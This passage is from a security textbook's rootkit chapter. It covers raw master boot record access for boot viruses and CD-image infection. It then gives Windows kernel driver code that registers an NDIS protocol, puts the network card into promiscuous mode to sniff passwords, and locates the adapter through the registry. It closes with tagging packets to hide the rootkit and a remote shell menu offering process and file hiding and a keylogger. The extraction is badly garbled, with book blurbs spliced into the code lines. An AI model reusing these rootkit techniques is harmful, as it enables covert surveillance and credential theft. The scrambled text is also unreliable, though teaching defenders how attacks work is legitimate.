- •Exploiting Software How to Break Code
- •Table of Contents
- •Copyright
- •Praise for Exploiting Software
- •Attack Patterns
- •Foreword
- •Preface
- •What This Book Is About
- •How to Use This Book
- •But Isn't This Too Dangerous?
- •Acknowledgments
- •Greg's Acknowledgments
- •Gary's Acknowledgments
- •Bad Software Is Ubiquitous
- •The Trinity of Trouble
- •The Future of Software
- •What Is Software Security?
- •Conclusion
- •Chapter 2. Attack Patterns
- •A Taxonomy
- •An Open-Systems View
- •Tour of an Exploit
- •Attack Patterns: Blueprints for Disaster
- •An Example Exploit: Microsoft's Broken C++ Compiler
- •Applying Attack Patterns
- •Attack Pattern Boxes
- •Conclusion
- •Into the House of Logic
- •Should Reverse Engineering Be Illegal?
- •Reverse Engineering Tools and Concepts
- •Approaches to Reverse Engineering
- •Methods of the Reverser
- •Writing Interactive Disassembler (IDA) Plugins
- •Decompiling and Disassembling Software
- •Decompilation in Practice: Reversing helpctr.exe
- •Automatic, Bulk Auditing for Vulnerabilities
- •Writing Your Own Cracking Tools
- •Building a Basic Code Coverage Tool
- •Conclusion
- •Chapter 4. Exploiting Server Software
- •The Trusted Input Problem
- •The Privilege Escalation Problem
- •Finding Injection Points
- •Input Path Tracing
- •Exploiting Trust through Configuration
- •Specific Techniques and Attacks for Server Software
- •Conclusion
- •Chapter 5. Exploiting Client Software
- •Client-side Programs as Attack Targets
- •In-band Signals
- •Cross-site Scripting (XSS)
- •Client Scripts and Malicious Code
- •Content-Based Attacks
- •Conclusion
- •Chapter 6. Crafting (Malicious) Input
- •The Defender's Dilemma
- •Intrusion Detection (Not)
- •Partition Analysis
- •Tracing Code
- •Reversing Parser Code
- •Misclassification
- •Audit Poisoning
- •Conclusion
- •Chapter 7. Buffer Overflow
- •Buffer Overflow 101
- •Injection Vectors: Input Rides Again
- •Buffer Overflows and Embedded Systems
- •Database Buffer Overflows
- •Buffer Overflows and Java?!
- •Content-Based Buffer Overflow
- •Audit Truncation and Filters with Buffer Overflow
- •Causing Overflow with Environment Variables
- •The Multiple Operation Problem
- •Finding Potential Buffer Overflows
- •Stack Overflow
- •Arithmetic Errors in Memory Management
- •Format String Vulnerabilities
- •Heap Overflows
- •Buffer Overflows and C++
- •Payloads
- •Payloads on RISC Architectures
- •Multiplatform Payloads
- •Prolog/Epilog Code to Protect Functions
- •Conclusion
- •Chapter 8. Rootkits
- •Subversive Programs
- •A Simple Windows XP Kernel Rootkit
- •Call Hooking
- •Trojan Executable Redirection
- •Hiding Files and Directories
- •Patching Binary Code
- •The Hardware Virus
- •Low-Level Disk Access
- •Adding Network Support to a Driver
- •Interrupts
- •Key Logging
- •Advanced Rootkit Topics
- •Conclusion
- •References
- •Index
Low-Level Disk Access
Another traditional method of storing viruses has been on boot blocks, floppy disks, and hard drives. Interestingly enough, these techniques still work today and it's quite simple to access the boot block of a drive. The following code illustrates a simple method to read and write
• Table of Contents
from the master boot record on an NT system.
•Index
Exploiting Software How to Break Code
Reading/WritingByGreg Hoglund,Gary McGrawthe Master Boot Record (MBR)
Publisher: Addison Wesley
To obtain access to the MBR you must have raw read/write access to the physical drive itself. UsingPubaDate:simpleFebruarycall17,to 2004CreateFile and the proper object name, you can open any of the drives ISBN:on a 0system-201-78695. The-8 following code shows how to open a handle to the first physical drive and subsequentlyPages: 512 read the first 512 bytes of data from it. This block of data contains the contents of the first drive sector, otherwise known as the MBR.
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
char mbr_data[512];
attack, you must first learn how real attacks are really carried out.
DWORD dwBytesRead;
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
HANDLEWhyhDriversoftware= exploitCreateFile("\\\\will continue.to\\physicaldrive0",be a serious problem
When network security mechanisms do not work
GENERIC_READ | GENERIC_WRITE,
Attack patterns
FILE_SHARE_READ | FILE_SHARE_WRITE,
0,Reverse engineering
Classic attacks against server software
OPEN_EXISTING,
Surprising attacks against client software
0,
Techniques for crafting malicious input
0);
The technical details of buffer overflows
Rootkits
ReadFile( hDriver, &mbr_data, 512, &dwBytesRead, NULL );
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
Infecting CD-ROM Images
CD-ROMs use the ISO9660 file system. These can be infected with virus programs in a similar way that floppy disks can be infected with a virus. A bootable CD can most certainly contain a virus that is activated on boot. Another trick is using the AUTORUN.INF file. The
AUTORUN.INF file causes programs to be launched automatically when the CD is inserted. This feature is often on by default. Lastly, files on the CD can simply be infected using standard tricks. There is nothing stopping a virus or rootkit from accessing a CD-R drive and burning information to a mounted (writable) CD disk.[7]
[7] More on the idea of infecting CD images can be found in the 'zine 29A Labs, issue 6, "Infecting ISO CD Images" by ZOMBiE.
•Table of Contents
•Index
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
Adding Network Support to a Driver
Allowing a rootkit driver to talk to the network adds a final, but critical touch, allowing the code be accessed remotely. It is possible to embed a TCP/IP stack into a driver and open a remote shell. In fact, the popular kernel-mode debugger called SoftIce has this feature. The NTROOT
• |
Table of Contents |
rootkit distributed from www.rootkit.com has sample code that exposes a TCP/IP shell. Under |
|
• |
Index |
Windows NT, an easy way to build network support is to use the NDIS library. Unfortunately no
Exploitingmany deviceSoftwaredriverHowbooksto BreakcoverCodethe subject of network device drivers. Thus, use of NDIS has no
been well documented outside the DDK.
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
UsingPub Dathe: FebruaryNDIS17,Library2004
ISBN: 0-201-78695-8
MicrosoftPages:supplies512 the NDIS library for network and protocol drivers to implement their own sta independent of the network card. We can use this library to build a stack and communicate with the network. This is one way that a rootkit driver can provide an interactive shell.
The first step in using NDIS is to register a set of callback functions for NDIS operations. The
OnXXX values are pointers to callback functions.[8]
How does software break? How do attackers make software break on purpose? Why are
firewalls,[8] intrusion detection systems, and antivirus software not keeping out the bad guys?
Complete source for these examples can be obtained from http://www.rootkit.com.
What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING
Why software exploit will continue to be a serious problem
theRegistryPath )
When network security mechanisms do not work
{ |
Attack patterns |
|
|
ReverseNDISengineeringPROTOCOL_CHARACTERISTICS |
aProtocolChar; |
|
Classic attacks against server software |
// DD |
|
UNICODE STRING aDriverName; |
Surprising attacks against client software
Techniques for crafting malicious input
/*
The technical details of buffer overflows
* init network sniffer - this is all standard and
Rootkits
* documented in the DDK.
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break software. */
RtlZeroMemory( &aProtocolChar,
sizeof(NDIS_PROTOCOL_CHARACTERISTICS));
aProtocolChar.MajorNdisVersion |
= 3; |
aProtocolChar.MinorNdisVersion |
= 0; |
aProtocolChar.Reserved |
= 0; |
|
aProtocolChar.OpenAdapterCompleteHandler |
= OnOpenAdapterDone; |
|
aProtocolChar.CloseAdapterCompleteHandler |
= |
OnCloseAdapterDone; |
aProtocolChar.SendCompleteHandler |
= |
OnSendDone; |
•Table of Contents
• |
aProtocolChar.TransferDataCompleteHandlerIndex |
= OnTransferDataDone; |
Exploiting Software How to Break Code |
= OnResetDone; |
|
|
aProtocolChar.ResetCompleteHandler |
|
ByGreg Hoglund,Gary McGraw |
|
|
|
aProtocolChar.RequestCompleteHandler |
= OnRequestDone; |
|
Publisher: Addison Wesley |
|
|
Pub Date:aProtocolCharFebruary 17, 2004.ReceiveHandler |
= OnReceiveStub; |
|
ISBN: 0-201-78695-8 |
|
|
Pages:aProtocolChar.ReceiveCompleteHandler512 |
= OnReceiveDoneStub; |
|
aProtocolChar.StatusHandler |
= OnStatus; |
|
aProtocolChar.StatusCompleteHandler |
= OnStatusDone; |
How does software break? How do attackers make software break on purpose? Why are aProtocolChar.Name = aProtoName;
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
DbgPrint("ROOTKIT: Registering NDIS Protocol\n");
techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the
NdisRegisterProtocol( &aStatus,
script kiddie treatment found in many hacking books, you will learn about
&aNdisProtocolHandle,
Why software exploit will continue to be a serious problem
&aProtocolChar,
When network security mechanisms do not work
sizeof(NDIS_PROTOCOL_CHARACTERISTICS));
Attack patterns
Reverse engineering
if (aStatus != NDIS_STATUS_SUCCESS) {
Classic attacks against server software
DbgPrint(("DriverEntry: ERROR NdisRegisterProtocol failed\n"));
Surprising attacks against client software
return aStatus;
Techniques for crafting malicious input
}
The technical details of buffer overflows
Rootkits
ExploitingaDriverNameSoftwareis.Lengthfilled with= the0; tools, concepts, and knowledge necessary to break
software.
aDriverName.Buffer = ExAllocatePool( PagedPool, MAX_PATH_LENGTH );
aDriverName.MaximumLength = MAX_PATH_LENGTH;
RtlZeroMemory(aDriverName.Buffer, MAX_PATH_LENGTH);
/* _______________________________________________________________
* get the name of the MAC-layer driver
* and the name of the packet driver
• *TableHKLM/SYSTEM/CurrentControlSet/Services/TcpIp/Linkageof Contents ..
• Index
* _______________________________________________________________ */
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
if (ReadRegistry( &aDriverName ) != STATUS_SUCCESS) {
Publisher: Addison Wesley
goto RegistryError;
Pub Date: February 17, 2004
ISBN:} 0-201-78695-8
Pages: 512
...
NdisOpenAdapter(
&aStatus,
How does software break? How do attackers make software break on purpose? Why are
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
&aErrorStatus,
What tools can be used to break software? This book provides the answers.
&anOpenP->AdapterHandle,
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
&aDeviceExtension->Medium, attack, you must first learn how real attacks are really carried out.
&aMediumArray,
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
1,
Why software exploit willaDeviceExtensioncontinue to be a-serious>NdisProtocolHandle,problem
When network security mechanisms do not work anOpenP,
Attack patterns
&aDeviceExtension->AdapterName,
Reverse engineering
0,
Classic attacks against server software
NULL);
Surprising attacks against client software
if (aStatus != NDIS_STATUS_PENDING)
Techniques for crafting malicious input
{
The technical details of buffer overflows
OnOpenAdapterDone(
Rootkits
anOpenP,
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software. aStatus,
NDIS_STATUS_SUCCESS
);
}
...
}
•Table of Contents
•Index
ExploitingThe first callSoftwareis toHowNdisRegisterProtocolto Break Code , which is how we register our callback functions. The
second call is to ReadRegistry (explained later), which tells us the binding name for the netwo
ByGreg Hoglund,Gary McGraw
card. This information is used to initialize the device extension structure that is then used in a c toNdisOpenAdapter. If the call returns success, we must manually call OnOpenAdapterDone. If
the call returns NDIS_STATUS_PENDING this means that the OS is going to make a callback to
Pub Date: February 17, 2004
OnOpenAdapterDone on our behalf.
ISBN: 0-201-78695-8
Pages: 512
Putting the Interface in Promiscuous Mode
When a network interface is in "promiscuous mode" it can sniff all packets that are physically
delivered to the interface, regardless of target address. This is required if you want to see traffi How does software break? How do attackers make software break on purpose? Why are
that is destined for other machines on the network. We put the network interface card into firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
promiscuous mode so the rootkit can sniff passwords and other communications channel What tools can be used to break software? This book provides the answers.
information. This is performed in the OnOpenAdapterDone call. We use the NdisRequest functio
to set the interface into promiscuous mode:
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
VOID When network security mechanisms do not work
Attack patterns
OnOpenAdapterDone( IN NDIS_HANDLE ProtocolBindingContext,
Reverse engineering
IN NDIS_STATUS Status,
Classic attacks against server software
IN NDIS_STATUS OpenErrorStatus )
Surprising attacks against client software
{
Techniques for crafting malicious input
PIRP Irp = NULL;
The technical details of buffer overflows
POPEN_INSTANCE |
Open = NULL; |
Rootkits |
|
NDIS_REQUEST anNdisRequest;
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software. |
anotherStatus; |
BOOLEAN |
|
ULONG |
aMode = NDIS_PACKET_TYPE_PROMISCUOUS; |
DbgPrint("ROOTKIT: OnOpenAdapterDone called\n");
/* set card into promiscuous mode */
if(gOpenInstance){
//
// Initializing the event
•Table of Contents
•//Index
Exploiting Software How to Break Code
NdisInitializeEvent(&gOpenInstance->Event);
ByGreg Hoglund,Gary McGraw
anNdisRequest.RequestType = NdisRequestSetInformation;
Publisher: Addison Wesley
Pub Date: February 17, 2004
anNdisRequest.DATA.SET_INFORMATION.Oid = OID_GEN_CURRENT_PACKET_FILTER;
ISBN: 0-201-78695-8
Pages:anNdisRequest512 .DATA.SET_INFORMATION.InformationBuffer = &aMode;
anNdisRequest.DATA.SET_INFORMATION.InformationBufferLength =
sizeof(ULONG);
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
NdisRequest( &anotherStatus,
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys togOpenInstancebreak oftware->AdapterHandle,. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
&anNdisRequest
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in);many hacking books, you will learn about
}
Why software exploit will continue to be a serious problem
return;
When network security mechanisms do not work
}
Attack patterns
Reverse engineering
Classic attacks against server software
Finding the Correct Network Card
Surprising attacks against client software
WindowsTechniquesstores informationcr fting aboutmaliciousnetworkinputcards in the following registry key:
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
Under this key are a series of numbered subkeys. Each subkey represents a network card or
interface. The subkey contains a very important value called ServiceName. This value is a strin that contains the GUID, which must be used to open the adapter. The rootkit driver must obtain one of these GUID strings to open a binding to the adapter using NDIS.
The following code snippet obtains this GUID value for the first network interface listed[9]:
[9]Once again, all this code can be obtained from http://www.rootkit.com as part of the NTROOT rootkit driv
•Table of Contents
•Index
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
/* this is major work just to enum a subkey value */
Pages: 512
NTSTATUS
EnumSubkeys(
IN PWSTR theRegistryPath,
How does software break? How do attackers make software break on purpose? Why are
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
IN PUNICODE_STRING theStringP
What tools can be used to break software? This book provides the answers.
)Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from
{attack, you must first learn how real attacks are really carried out.
This must//----------------------------------------------------have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
// for opening parent key
Why software exploit will continue to be a serious problem
HANDLE hKey;
When network security mechanisms do not work
OBJECT_ATTRIBUTES oa;
Attack patterns
NTSTATUS Status;
Reverse engineering
UNICODE_STRING ParentPath;
Classic attacks against server software
Surprising attacks against client software
// for enumerating a subkey
Techniques for crafting malicious input
KEY_BASIC_INFORMATION Info;
The technical details of buffer overflows
PKEY_BASIC_INFORMATION pInfo;
Rootkits
ULONG ResultLength;
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
ULONG Size;
PWSTR Position;
PWSTR FullName;
// for value query
|
RTL_QUERY_REGISTRY_TABLE aParamTable[2]; |
|
|
//---------------------------------------------------- |
|
|
DbgPrint("rootkit: entered EnumSubkeys()\n"); |
|
__try |
|
|
• |
Table of Contents |
|
• |
Index |
|
{ |
|
|
Exploiting Software How to Break Code |
|
|
ByGregRtlInitUnicodeString(&ParentPath,Hoglu d,Gary McGraw |
theRegistryPath); |
Publisher: Addison Wesley
Pub Date: February 17, 2004
/*
ISBN: 0-201-78695-8
Pages: 512
** First try opening this key
*/
InitializeObjectAttributes(&oa,
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems,&ParentPath,and an ivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.
OBJ_CASE_INSENSITIVE,
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
NULL,
attack, you must first learn how real attacks are really carried out.
(PSECURITY_DESCRIPTOR)NULL);
This must-have book may shock you—and it will certainly educate you.Getting beyond the
script kiddie treatment found in many hacking books, you will learn about
Status = ZwOpenKey(&hKey,
KEY_READ,
Why software exploit will continue to be a serious problem
&oa);
When network security mechanisms do not work
Attack patterns
ifReverse(!NT_engineeringSUCCESS(Status)) {
ClassicreturnattacksStatus;gainst server software
}Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
/*
Rootkits
**First find the length of the subkey data.
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
*/
software.
Status = ZwEnumerateKey(hKey,
0, /* index of zero */
KeyBasicInformation,
&Info,
sizeof(Info),
&ResultLength);
if (Status == STATUS_NO_MORE_ENTRIES || NT_ERROR(Status)) {
•Table of Contents
return Status;
•Index
Exploiting Software How to Break Code
}
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
Size = Info.NameLength + FIELD_OFFSET(KEY_BASIC_INFORMATION, Name[0]);
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512
pInfo = (PKEY_BASIC_INFORMATION)
ExAllocatePool(PagedPool, Size);
How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers. if (pInfo == NULL) {
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
Status = STATUS_INSUFFICIENT_RESOURCES;
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out. return Status;
This must-have book may shock you—and it will certainly educate you.Getting beyond the
}
script kiddie treatment found in many hacking books, you will learn about
Why software exploit will continue to be a serious problem
/*
When network security mechanisms do not work
**Now enumerate the first subkey.
Attack patterns
*/
Reverse engineering
Status = ZwEnumerateKey(hKey,
Classic attacks against server software
0,
Surprising attacks against client software
KeyBasicInformation,
Techniques for crafting malicious input
pInfo,
The technical details of buffer overflows
Rootkits |
Size, |
Exploiting Softwareis filled with&ResultLength);the tools, concepts, and knowledge necessary to break
software.
if (!NT_SUCCESS(Status)) {
ExFreePool((PVOID)pInfo);
return Status;
}
|
if (Size != ResultLength) { |
|
ExFreePool((PVOID)pInfo); |
|
Status = STATUS_INTERNAL_ERROR; |
• |
returnTable ofStatus;Contents |
• Index
}
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
Publisher: Addison Wesley
/*
Pub Date: February 17, 2004
**ISBN:Generate0-201-78695the-8 fully expanded name and query values.
Pages: 512
*/
FullName = ExAllocatePool(PagedPool,
ParentPath.Length +
How does software break? How do attackers make software break on purpose? Why are
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
sizeof(WCHAR) + // '\'
What tools can be used to break software? This book provides the answers.
pInfo->NameLength + sizeof(UNICODE_NULL));
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
techniques used by bad guys to break software. If you want to protect your software from
if (FullName == NULL) {
attack, you must first learn how real attacks are really carried out.
ExFreePool((PVOID)pInfo);
This must-have book may shock you—and it will certainly educate you.Getting beyond the
script kiddie treatment found in many hacking books, you will learn about return STATUS_INSUFFICIENT_RESOURCES;
}Why software exploit will continue to be a serious problem
When network security mechanisms do not work
RtlCopyMemory((PVOID)FullName,
Attack patterns (PVOID)ParentPath.Buffer,
Reverse engineering
ParentPath.Length);
Classic attacks against server software
Position = FullName + ParentPath.Length / sizeof(WCHAR);
Surprising attacks against client software
Position[0] = '\\';
Techniques for crafting malicious input
Position++;
The technical details of buffer overflows
RtlCopyMemory((PVOID)Position,
Rootkits
(PVOID)pInfo->Name,
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software. pInfo->NameLength);
Position += pInfo->NameLength / sizeof(WCHAR);
/*
** Null terminate.
*/
Position[0] = UNICODE_NULL;
ExFreePool((PVOID)pInfo);
/*
•Table of Contents
•** GetIndexthe value data for binding.
Exploiting Software How to Break Code
**
ByGreg Hoglund,Gary McGraw
*/
Publisher: Addison Wesley
Pub Date: February 17, 2004 |
|
RtlZeroMemory( &aParamTable[0], sizeof(aParamTable) ); |
|
ISBN: 0-201-78695-8 |
|
Pages: 512 |
|
aParamTable[0].Flags = |
RTL_QUERY_REGISTRY_DIRECT | |
|
RTL_QUERY_REGISTRY_REQUIRED; |
How does software break? How do attackers make software break on purpose? Why are
aParamTable[0].Name = L"ServiceName";
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers. aParamTable[0].EntryContext = theStringP; /* will be allocated */
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.
// Because we are using required and direct,
This must-have book may shock you—and it will certainly educate you.Getting beyond the script//kiddiewe don'ttreatmneednt foundto setin manydefaultshacking. books, you will learn about
// IMPORTANT note, the last entry is ALL NULL,
Why software exploit will continue to be a serious problem
// required by call to know when it's done. Don't forget!
When network security mechanisms do not work
Attack patterns
Status=RtlQueryRegistryValues(
Reverse engineering
RTL_REGISTRY_ABSOLUTE | RTL_REGISTRY_OPTIONAL,
Classic attacks against server software
Surprising attacksFullName,against client software
Techniques for crafting&aParamTable[0],malicious input
The technical details of buffer overflows
NULL,
Rootkits |
NULL ); |
|
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
ExFreePool((PVOID)FullName);
return(Status);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
DbgPrint("rootkit: Exception in EnumSubkeys(). Unknown error.\n");
}
return STATUS_UNSUCCESSFUL;
•Table of Contents
}
•Index
Exploiting Software How to Break Code
ByGreg Hoglund,Gary McGraw
/* ___________________________________________________________________________
Publisher: Addison Wesley
. This code reads the registry to determine the name of the network interface
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
. card. It grabs the first registered name, regardless of how many
Pages: 512
. are present. It would be better to bind to all of them, but for
. simplicity we are only binding to the first.
How does software break? How do attackers make software break on purpose? Why are
. ___________________________________________________________________________
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
NTSTATUS ReadRegistry( IN PUNICODE_STRING theBindingName ) {
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
NTSTATUS aStatus;
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
UNICODE_STRING aString;
This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about
DbgPrint("ROOTKIT: ReadRegistry called\n");
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
__try
Attack patterns
{
Reverse engineering
aString.Length = 0;
Classic attacks against server software
aString.Buffer = ExAllocatePool( PagedPool, MAX_PATH_LENGTH ); /* free me *
Surprising attacks against client software
aString.MaximumLength = MAX_PATH_LENGTH;
Techniques for crafting malicious input
RtlZeroMemory(aString.Buffer, MAX_PATH_LENGTH);
The technical details of buffer overflows
aStatus = EnumSubkeys(
Rootkits
L"\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows" \
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.
"NT\\CurrentVersion\\NetworkCards",
&aString );
if(!NT_SUCCESS(aStatus)){
DbgPrint(( |
"rootkit: RtlQueryRegistryValues failed Code = 0x%0x\ |
|
aStatus)); |
}
else{
•Table of Contents
RtlAppendUnicodeToString(theBindingName, L"\\Device\\");
•Index
Exploiting Software How to Break Code
RtlAppendUnicodeStringToString(theBindingName, &aString);
ByGreg Hoglund,Gary McGraw
ExFreePool(aString.Buffer);
Publisher: Addison Wesley
return aStatus; /* were good */
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
}
Pages: 512
return aStatus; /* last error */
}
How does software break? How do attackers make software break on purpose? Why are
__except(EXCEPTION_EXECUTE_HANDLER)
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
{
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and
DbgPrint("rootkit: Exception occurred in ReadRegistry(). Unknown error. \n techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
}
This must-have book may shock you—and it will certainly educate you.Getting beyond the return STATUS_UNSUCCESSFUL;
script kiddie treatment found in many hacking books, you will learn about
}
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Usingboron Tags for Security
Reverse engineering
One nice trick to use to prevent people from detecting the rootkit network interface is to require
Classic attacks against server software
certain source port or IP ID value before the rootkit will respond to a packet. This idea can be
extended to any data in the packet, but the key is that some obscure knowledge is required bef
Surprising attacks against client software
the rootkit will respond. Remember that a rootkit can be compiled and customized by anyone,
thus the choice of obfuscation is left up to your imagination. Techniques for crafting malicious input
The technical details of buffer overflows
Adding an Interactive Shell
Rootkits
A rootkit can have a remote TCP/IP shell directly into the kernel. Here is an example from of the Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break menu provided by one of the rootkits at www.rootkit.com:
software.
Win2K Rootkit by the team rootkit.com
Version 0.4 alpha
------------------------------------------
command description
•Table of Contents
ps |
show proclist |
•Index
Exploiting Software How to Break Code
help |
this data |
ByGreg Hoglund,Gary McGraw |
|
buffertest |
debug output |
Publisher: Addison Wesley |
|
hidedirPub Date: February 17,hide2004 prefixed file/dir |
|
ISBN: 0-201-78695-8 |
|
hideprocPages: 512 |
hide prefixed processes |
debugint |
(BSOD)fire int3 |
sniffkeys |
toggle keyboard sniffer |
How does software break? How do attackers make software break on purpose? Why are |
|
echo <string> |
echo the given string |
firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?
What tools can be used to break software? This book provides the answers.
*(BSOD) means Blue Screen of Death
Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and if a kernel debugger is not present!
techniques used by bad guys to break software. If you want to protect your software from
attack, you must first learn how real attacks are really carried out.
*'prefixed' means the process or filename
This must-have book may shock you—and it will certainly educate you.Getting beyond the starts with the letters '_root_'.
script kiddie treatment found in many hacking books, you will learn about
;
Why software exploit will continue to be a serious problem
When network security mechanisms do not work
Attack patterns
Reverse engineering
Classic attacks against server software
Surprising attacks against client software
Techniques for crafting malicious input
The technical details of buffer overflows
Rootkits
Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break
software.